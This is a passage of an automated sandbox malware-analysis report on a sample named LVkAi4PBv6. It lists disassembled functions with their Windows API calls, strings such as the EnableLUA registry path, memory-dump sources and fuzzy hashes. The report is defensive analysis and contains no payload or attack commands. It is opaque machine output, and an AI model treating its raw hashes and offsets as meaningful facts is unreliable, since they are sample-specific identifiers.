                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d9b10ca7d5aba5836c0a81d60320bf5f493656db7c7166e6d4aadbd30bdfe309
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB11A032B04315AFDB115F58DC84FAAB7A6FF54324F264179EA18EF292C771A850CB81
                                                                                                                                                                                                                                                                                                  Function 008A563F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54sleepCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(20000004,00000000,00000000,00000000,00000000,00000000,?,?,00878E97,?,00000001,20000004,00000000,00000000,?,00000000), ref: 008A566E
                                                                                                                                                                                                                                                                                                  • SetNamedSecurityInfoW.ADVAPI32(00000000,?,000007D0,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00878E97,?), ref: 008A5689
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: InfoNamedSecuritySleep
                                                                                                                                                                                                                                                                                                  • String ID: aclutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2352087905-2159165307
                                                                                                                                                                                                                                                                                                  • Opcode ID: d50d7824b22ceddd34205957f20d253c778a9741ae6be24c97af08cba3bec18d
                                                                                                                                                                                                                                                                                                  • Instruction ID: f21bc61b1210b4487d36c3e25ad08a93b18ce126ac89a79378367e405e8c8299
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d50d7824b22ceddd34205957f20d253c778a9741ae6be24c97af08cba3bec18d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87018E33801929BBDF229E88CD05ECE7F75FF56760F020255BE04A6620C6328D60DBD0
                                                                                                                                                                                                                                                                                                  Function 0086158C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LCMapStringW.KERNEL32(0000007F,00000000,00000000,008770E8,00000000,008770E8,00000000,00000000,008770E8,00000000,00000000,00000000,?,00862318,00000000,00000000), ref: 008615D0
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00862318,00000000,00000000,008770E8,00000200,?,008A52B2,00000000,008770E8,00000000,008770E8,00000000,00000000,00000000), ref: 008615DA
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastString
                                                                                                                                                                                                                                                                                                  • String ID: strutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3728238275-3612885251
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2fee4051cd2782f990f123411aa7e9289c7eb0c7ce080e93688d0db456547e86
                                                                                                                                                                                                                                                                                                  • Instruction ID: e1828de9708b9aaea7586b3a890759a273ece3ba7c8d1643687bc4eec6ddea74
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2fee4051cd2782f990f123411aa7e9289c7eb0c7ce080e93688d0db456547e86
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A801B93794153677CF218E998C4CE5B7A69FF86B61B0B0224FE10EB252D620DC1097E1
                                                                                                                                                                                                                                                                                                  Function 008757BD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000), ref: 008757D9
                                                                                                                                                                                                                                                                                                  • CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?,?), ref: 00875833
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to initialize COM on cache thread., xrefs: 008757E5
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: InitializeUninitialize
                                                                                                                                                                                                                                                                                                  • String ID: Failed to initialize COM on cache thread.
                                                                                                                                                                                                                                                                                                  • API String ID: 3442037557-3629645316
                                                                                                                                                                                                                                                                                                  • Opcode ID: 73c741d127096b92b21a79c7050363b47bdb4d108fdac556076dfca6450434da
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5687ac666ad8fca2b66d2114f65350a478b33056d8c9c4e43299f6107dca762b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 73c741d127096b92b21a79c7050363b47bdb4d108fdac556076dfca6450434da
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14015B72600619BFDB059BA8D884DEAFBACFF09354B008126FA09C7221DB71AD548B91
                                                                                                                                                                                                                                                                                                  Function 008A39AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 008A39F4
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A3A27
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                                                                                                                                                                                  • String ID: xmlutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 344208780-1270936966
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7be2bdec6244551e351bd1fb75e5bfa9c499b4877fb6356a44fa98a2b2715a6b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 374455975fdb49e2673988f0e0ad2f503b7231d26eba0010e6c63ef754b96761
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7be2bdec6244551e351bd1fb75e5bfa9c499b4877fb6356a44fa98a2b2715a6b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E301FD31A44229BBFB200A999C09FAB3AECFF43764F140439FC40EBB41D6B4DE008290
                                                                                                                                                                                                                                                                                                  Function 008A3929 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 008A396E
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A39A1
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                                                                                                                                                                                  • String ID: xmlutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 344208780-1270936966
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5293780d91e2f0552a4f1c09ffca2ae9252e9f31baeee1ebc46993e5faa0be29
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7d7ab20fbc9af9a5443c45a6d6a7bdf675591d7a9ff7637a4d6197a5b8b9c463
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5293780d91e2f0552a4f1c09ffca2ae9252e9f31baeee1ebc46993e5faa0be29
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B018F31644219ABEB201AA88805F7B3AD8FF43B64F150539FD44E7B41C7B4CE009691
                                                                                                                                                                                                                                                                                                  Function 008A3BF1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0F6C: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,008CAAA0,00000000,?,008A57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008A0F80
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,008A3A8E,?), ref: 008A3C62
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • EnableLUA, xrefs: 008A3C34
                                                                                                                                                                                                                                                                                                  • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 008A3C0C
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                                                                                                                                                  • String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
                                                                                                                                                                                                                                                                                                  • API String ID: 47109696-3551287084
                                                                                                                                                                                                                                                                                                  • Opcode ID: 08b15f6158fe5ecf290ca1b3980b4d14ba55f2d79886c802384a2658e58e632b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0067d69c8573fa455b33d754eca63b468f31dbaddc7eab1c733135db3298286b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08b15f6158fe5ecf290ca1b3980b4d14ba55f2d79886c802384a2658e58e632b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6017C32950229FBE720AAA4CC0ABAEF6A8FB15731F2041A9B900F3551E3795F5096D0
                                                                                                                                                                                                                                                                                                  Function 00865123 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,00861104,?,?,00000000), ref: 00865142
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,00861104,?,?,00000000), ref: 00865172
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareStringlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: burn.clean.room
                                                                                                                                                                                                                                                                                                  • API String ID: 1433953587-3055529264
                                                                                                                                                                                                                                                                                                  • Opcode ID: bdc19edd511b2c9b209540215ef67cc28cd7226b2996d906b9344047e8505827
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0109a74705e686e848ae88c5fcfccb67ce038df3c6846035d4b64366ee610e10
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bdc19edd511b2c9b209540215ef67cc28cd7226b2996d906b9344047e8505827
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92018172600A387F97348B89AD84E73BBBDFB16BA4F114216F90AC7610D3719C41CBA1
                                                                                                                                                                                                                                                                                                  Function 008A68B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 008A690F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A8713: SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 008A8820
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A8713: GetLastError.KERNEL32 ref: 008A882A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Time$ErrorFileFreeLastStringSystem
                                                                                                                                                                                                                                                                                                  • String ID: atomutil.cpp$clbcatq.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 211557998-3749116663
                                                                                                                                                                                                                                                                                                  • Opcode ID: 90b53a780d8cfcb353a03ceb909c71c0fd44fe4fa483e73d9ea1525f190624f7
                                                                                                                                                                                                                                                                                                  • Instruction ID: d0c333b1d4d1214d31c4f5b9b4856abd9f073c4eb89e6891ff38098914bcb8f2
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 90b53a780d8cfcb353a03ceb909c71c0fd44fe4fa483e73d9ea1525f190624f7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4601A7B190111AFBAB205F85C84186AFBA8FB16365B694179F504E7910E3759E20D7D0
                                                                                                                                                                                                                                                                                                  Function 00866522 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?), ref: 00866534
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00865EB2,00000000), ref: 008A0AE0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0ACC: GetProcAddress.KERNEL32(00000000), ref: 008A0AE7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0ACC: GetLastError.KERNEL32(?,?,?,00865EB2,00000000), ref: 008A0AFE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00865CE2: RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 00865D68
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to set variant value., xrefs: 00866571
                                                                                                                                                                                                                                                                                                  • Failed to get 64-bit folder., xrefs: 00866557
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressCloseCurrentErrorHandleLastModuleProcProcess
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get 64-bit folder.$Failed to set variant value.
                                                                                                                                                                                                                                                                                                  • API String ID: 3109562764-2681622189
                                                                                                                                                                                                                                                                                                  • Opcode ID: e099f08f2fef2688eba651404649a363b2a2e0213722ef1d0bc51597e2d3b405
                                                                                                                                                                                                                                                                                                  • Instruction ID: e2d45f809fb2ce82d4f1add21449d2efe264e56e6e5a19e5a424156246222f3a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e099f08f2fef2688eba651404649a363b2a2e0213722ef1d0bc51597e2d3b405
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10018B32C01268BBDB22AAA4CC0AA9EBB78FB01720F114155F901E6555EA319F60DB92
                                                                                                                                                                                                                                                                                                  Function 008633C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,008610DD,?,00000000), ref: 008633E8
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,008610DD,?,00000000), ref: 008633FF
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                                                                                  • String ID: pathutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2776309574-741606033
                                                                                                                                                                                                                                                                                                  • Opcode ID: ad648fe692a5d27def5c7775b64b21012f38cbcc2dc06d8873e8c4f45dfc5f7b
                                                                                                                                                                                                                                                                                                  • Instruction ID: ddc565f808ee51e41741fed195627581a7d1cdc64f609cf69a7fcd4636f55da5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad648fe692a5d27def5c7775b64b21012f38cbcc2dc06d8873e8c4f45dfc5f7b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4AF0CD73A4153567D72256AAAC4AA9BFA68FF92B70B174135BE04FB301DE61DD0082E0
                                                                                                                                                                                                                                                                                                  Function 0088E30F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0088EBD2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00891380: RaiseException.KERNEL32(?,?,?,0088EBF4,?,00000000,00000000,?,?,?,?,?,0088EBF4,?,008C7EC8), ref: 008913DF
                                                                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0088EBEF
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                                                  • String ID: Unknown exception
                                                                                                                                                                                                                                                                                                  • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                                                  • Opcode ID: 793352dfb24fceb9a501914f05cf041e010b479c7c3e399df58e244606ee35e7
                                                                                                                                                                                                                                                                                                  • Instruction ID: 09d36085022d9d28415f40f5e34c66ca7eb46fd1114a27d02a25927e385e6fac
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 793352dfb24fceb9a501914f05cf041e010b479c7c3e399df58e244606ee35e7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06F0C23590420DBACF00BAA8E84AE9D777CFA00360B5445A4F925E2691EB70EE1587D2
                                                                                                                                                                                                                                                                                                  Function 008A4A05 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,00000000,00000000,771B34C0,?,?,?,0086BA1D,?,?,?,00000000,00000000), ref: 008A4A1D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,0086BA1D,?,?,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 008A4A27
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastSize
                                                                                                                                                                                                                                                                                                  • String ID: fileutil.cpp
